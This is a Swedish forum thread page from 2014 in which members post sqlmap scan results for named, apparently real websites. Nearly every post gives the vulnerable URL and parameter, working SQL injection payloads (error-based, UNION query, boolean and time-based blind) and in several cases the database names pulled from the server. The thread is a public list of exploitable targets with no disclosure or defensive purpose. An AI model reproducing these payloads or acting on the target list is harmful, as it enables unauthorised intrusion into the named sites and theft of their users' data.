Vinnaren i pepparkakshustävlingen!
2014-03-14, 19:11
  #4129
Medlem
http://carlssonplanet.com.preview.bi...view.php?id=52

Kod:
Place: GET
Parameter: id
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=52' AND (SELECT 1019 FROM(SELECT COUNT(*),CONCAT(CHAR(58,98,117,
105,58),(SELECT (CASE WHEN (1019=1019) THEN 1 ELSE 0 END)),CHAR(58,120,122,122,5
8),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND 'fdpw'='f
dpw

inte kollat i databasen
Citera
2014-03-15, 13:04
  #4130
Medlem
http://www.lumberjacks.se/index.php?page=polls&show=67

Kod:
Place: GET
Parameter: show
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: page=polls&show=67' UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,99,
97,103,58),CHAR(106,106,113,84,106,89,72,78,84,100),CHAR(58,115,110,118,58)), NU
LL# AND 'REQN'='REQN


inte kollat i databasen
Citera
2014-03-16, 19:24
  #4131
Medlem
http://www.eliteprospects.com/team.php?team=243

Kod:
Place: GET
Parameter: team
    Type: UNION query
    Title: MySQL UNION query (123) - 1 column (custom)
    Payload: team=-7327 UNION ALL SELECT CONCAT(0x7169667971,0x70656c61515263466
56e,0x7161706a71)#
  • available databases
  • eliteprospects
  • information_schema
Citera
2014-03-16, 19:41
  #4132
Medlem
http://www.medicinskyoga.se/?verk=fo...sv&forsk_id=54

Kod:
Place: GET
Parameter: forsk_id
    Type: UNION query
    Title: MySQL UNION query (NULL) - 7 columns
    Payload: verk=forsk&list=sv&forsk_id=54 UNION ALL SELECT NULL,CONCAT(0x716d7
26f71,0x436470654247726b7572,0x7169707171),NULL,NULL,NULL,NULL,NULL#

inte kollat i databasen
Citera
2014-03-16, 21:25
  #4133
Medlem
http://www.bonuscopyright.se/texter/read.php?mid=5106

Kod:
Place: GET
Parameter: mid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: mid=5106 AND 2292=2292

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: mid=5106 AND SLEEP(5)

  • available databases
  • `♥`
  • ` `
  • `A
  • ♣♣`
  • `connect`
  • adz
  • annons
  • apple
  • archive
  • atlas
  • backup
  • crm
  • directory
  • game
  • gameconnect
  • health
  • home
  • information_schema
  • irc
  • kunder
  • layout
  • log
  • mat
  • member
  • moved
  • mysql
  • netciyy
  • pages
  • quiz
  • resources
  • sandman
  • services
  • shop
  • social
  • test
  • vote
Citera
2014-03-17, 10:22
  #4134
Medlem
http://www.leta.se/geturl.php?id=9449

Kod:
Place: GET
Parameter: id
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=9449 AND (SELECT 1015 FROM(SELECT COUNT(*),CONCAT(0x71686f6f71,(
SELECT (CASE WHEN (1015=1015) THEN 1 ELSE 0 END)),0x7179757a71,FLOOR(RAND(0)*2))
x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  • available databases [12]:
  • ibtmon
  • information_schema
  • leta
  • leta_beta
  • leta_beta_preview
  • leta_preview
  • m_leta
  • m_leta_beta
  • m_leta_beta_preview
  • m_leta_preview
  • mysql
  • test

inte kollat i baser
Citera
2014-03-17, 12:20
  #4135
Medlem
http://www.havkom.se/news.asp?language=1

Kod:
Place: GET
Parameter: language
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: language=1 AND 7268=7268
  • fetching number of databases
  • resumed: 145

blind metod så stängde av inge lust att vänta
Citera
2014-03-18, 11:47
  #4136
Medlem
http://www.handelskammarenmalardalen...00&npostid=881

blind metod så väntar inte
  • fetching number of databases
  • retrieved: 89
Citera
2014-03-18, 13:38
  #4137
Medlem
http://www.onlinevoices.com/index.as...ivdate=3/17/20

Kod:
Place: GET
Parameter: npageid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: npageid=1047 AND 7012=7012&ncategoryid=19&sarkivdate=3/17/20

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: npageid=1047 AND SLEEP(5)&ncategoryid=19&sarkivdate=3/17/20

  • available databases [17]:
  • cms_onlinevoices
  • crm_mall
  • crmdemo
  • crmportalen2_shared
  • foo
  • google
  • information_schema
  • mysql
  • performance_schema
  • phrasebackup
  • rensalang
  • restore1
  • test
  • widevox
  • widevox2
  • widevox3
  • widevox_design
Citera
2014-03-18, 17:22
  #4138
Medlem
SpecialEditions avatar
@butkus: Kör du någon typ av program som kollar sårbarhet?
Citera
2014-03-18, 17:43
  #4139
Medlem
escape.s avatar
Citat:
Ursprungligen postat av SpecialEdition
@butkus: Kör du någon typ av program som kollar sårbarhet?
Haha, vad fan tror du? Det är SQLMap...
Citera
2014-03-18, 22:33
  #4140
Medlem
SpecialEditions avatar
Citat:
Ursprungligen postat av escape.
Haha, vad fan tror du? Det är SQLMap...
Jag tror ingenting, det var därför jag frågade
Citera

Stöd Flashback

Flashback finansieras genom donationer från våra medlemmar och besökare. Det är med hjälp av dig vi kan fortsätta erbjuda en fri samhällsdebatt. Tack för ditt stöd!

Stöd Flashback